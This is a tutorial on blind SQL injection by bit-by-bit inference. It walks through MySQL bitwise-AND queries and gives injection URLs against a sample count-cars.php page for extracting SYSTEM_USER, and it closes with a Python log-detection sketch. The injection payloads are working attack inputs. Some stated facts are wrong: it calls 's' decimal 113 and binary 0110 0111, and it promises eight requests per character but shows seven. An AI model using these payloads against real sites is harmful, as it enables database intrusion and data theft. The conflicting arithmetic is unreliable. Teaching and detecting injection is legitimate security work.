# Blind SQL Injection: Bit-by-Bit Inference

In the last example we used the binary search technique to get each character of `SYSTEM_USER`, inferring a group of 8 bits (1 byte) through a series of selected requests.

Now you’ll use another technique, in which each request selects a single bit at a chosen position.

Take as an example the character `s`, which is represented in decimal as `113₁₀` and in binary as `0110 0111₂`. To use the bit-by-bit technique here, apply a bitwise `AND` between the character's byte and a byte that has a single bit set at the position being tested; if the predicate returns true the bit is `1`, otherwise the bit is `0`.

Let’s start with the 8 requests, one for each significant bit set, corresponding to `64₁₀`, `32₁₀`, `16₁₀`, `8₁₀`, `4₁₀`, `2₁₀` and `1₁₀`.

```
mysql> SELECT ASCII('s') & 64 = 64;
+----------------------+
| ASCII('s') & 64 = 64 |
+----------------------+
|                    1 |
+----------------------+
```

```
mysql> SELECT ASCII('s') & 32 = 32;
+----------------------+
| ASCII('s') & 32 = 32 |
+----------------------+
|                    1 |
+----------------------+
```

```
mysql> SELECT ASCII('s') & 16 = 16;
+----------------------+
| ASCII('s') & 16 = 16 |
+----------------------+
|                    1 |
+----------------------+
```

```
mysql> SELECT ASCII('s') & 8 = 8;
+----------------------+
| ASCII('s') & 8 = 8   |
+----------------------+
|                    0 |
+----------------------+
```

```
mysql> SELECT ASCII('s') & 4 = 4;
+----------------------+
| ASCII('s') & 4 = 4   |
+----------------------+
|                    0 |
+----------------------+
```

```
mysql> SELECT ASCII('s') & 2 = 2;
+----------------------+
| ASCII('s') & 2 = 2   |
+----------------------+
|                    1 |
+----------------------+
```

```
mysql> SELECT ASCII('s') & 1 = 1;
+----------------------+
| ASCII('s') & 1 = 1   |
+----------------------+
|                    1 |
+----------------------+
```

And that gives us a byte representation of `0111 0011₂`.

Let’s apply the same method to infer the value of `SYSTEM_USER`, which is unknown.

You start by checking the length of `SYSTEM_USER`, which tells you the number of characters (the number of positions to check):

``LENGTH(SYSTEM_USER())``

```
http://example.com/count-cars.php?car_name=Ford' AND LENGTH(SYSTEM_USER()) = '14
```

Then you get the ASCII representation of the first character and compare it against `64₁₀`:

``ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) & 64 = 64``

```
http://example.com/count-cars.php?car_name=Ford' AND ASCII(SUBSTRING(SYSTEM_USER(), 1,1)) %26 '64' = '64
```

If the predicate is true the number of cars is displayed; otherwise you get the message `Nothing to show`.

You have to keep making these requests: for each character (position) you make 8 requests, from `64₁₀` down to `1₁₀`. Since the length of the username is `14`, that gives a total of `(14 positions * 8 requests) = 112 requests`.
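Seen from the server side, this run of near-identical requests that differ only in a single-bit mask is easy to spot in access logs. The following detection sketch is an added example, not code from the original page; the simplified log format, the client addresses (documentation ranges), the `min_masks` threshold and the function name `find_bit_probes` are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Predicate shape used on this page, after URL decoding:
#   ASCII(SUBSTRING(<expr>, <pos>,1)) & <mask> = <mask>   (quotes around the mask optional)
PROBE = re.compile(
    r"ASCII\s*\(\s*SUBSTRING\s*\(.+?,\s*(\d+)\s*,\s*1\s*\)\s*\)"
    r"\s*&\s*'?(\d+)'?\s*=\s*'?(\d+)",
    re.IGNORECASE,
)

def find_bit_probes(log_lines, min_masks=4):
    """Return {client: {position: sorted masks}} for clients that tested at
    least `min_masks` distinct single-bit masks on one character position."""
    seen = defaultdict(lambda: defaultdict(set))
    for line in log_lines:
        client, _, rest = line.partition(" ")
        m = PROBE.search(unquote_plus(rest))  # turns %26 back into '&'
        if not m:
            continue
        pos, mask, cmp_ = (int(g) for g in m.groups())
        # A single-bit test compares a power-of-two mask against itself.
        if mask == cmp_ and mask > 0 and mask & (mask - 1) == 0:
            seen[client][pos].add(mask)
    flagged = {}
    for client, by_pos in seen.items():
        hits = {p: sorted(ms) for p, ms in by_pos.items() if len(ms) >= min_masks}
        if hits:
            flagged[client] = hits
    return flagged

# Constructed sample log: one ordinary request, then the per-bit requests
# for position 1 with the masks listed on this page.
MASKS = [64, 32, 16, 8, 4, 2, 1]
SAMPLE_LOG = [
    '203.0.113.9 "GET /count-cars.php?car_name=Ford HTTP/1.1" 200',
] + [
    '198.51.100.7 "GET /count-cars.php?car_name=Ford%27%20AND%20ASCII(SUBSTRING('
    f'SYSTEM_USER(),%201,1))%20%26%20%27{m}%27%20=%20%27{m} HTTP/1.1" 200'
    for m in MASKS
]

if __name__ == "__main__":
    for client, hits in find_bit_probes(SAMPLE_LOG).items():
        print(client, hits)
```

The threshold keeps a single stray match from raising an alert; tune it to how many masks per position you consider conclusive.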